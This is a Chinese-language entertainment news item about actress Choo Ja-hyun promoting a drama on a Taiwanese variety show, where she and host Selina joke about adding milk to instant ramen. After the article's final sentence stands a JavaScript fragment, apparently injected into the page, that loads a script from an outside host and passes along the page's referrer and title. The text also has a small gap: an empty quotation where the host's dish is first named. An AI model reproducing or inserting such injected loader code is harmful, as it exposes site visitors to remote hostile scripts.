韓國女演員秋瓷炫日前上《別讓身體不開心》,宣傳新電視劇《秀秀的男人》,上節目她透露在韓國很愛下廚,最拿手的是「泡菜湯」,結果Selina回說自己招牌菜是「」笑翻大家。

秋瓷炫說:「在韓國平常也喜歡下廚」拿手菜是泡菜湯、大醬湯和海鮮煎餅,主持人Selina聽到後搞笑回應自己的招牌菜是「辛拉麵」,甚至教秋瓷炫「如何煮辛拉麵才好吃」,她說:「煮辛拉麵的時候,要加一半的水和一半的鮮奶,湯頭很好吃。」沒想到秋瓷炫聽完神打槍Selina,並解釋加牛奶的真正含義。

 

▲秋瓷炫上《別讓身體不開心》宣傳新劇。(圖/年代提供,2016.12.26)

▲秋瓷炫上《別讓身體不開心》宣傳新劇。(圖/年代提供,2016.12.26)

秋瓷炫竟說:「其實加牛奶不是為了好吃,是因為在韓國辛拉麵都是晚上11、12點當宵夜,所以加一點牛奶(臉)才不會腫。」Selina恍然大悟,搞笑說原來教我這個方法的人,是嫌我「臉腫」氣得她拍桌大喊:「我還在那邊宣傳多香、多好吃,我被害了啦!」嚇得秋瓷炫急忙安慰她:「也是很好吃的!」全場笑翻。s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + “;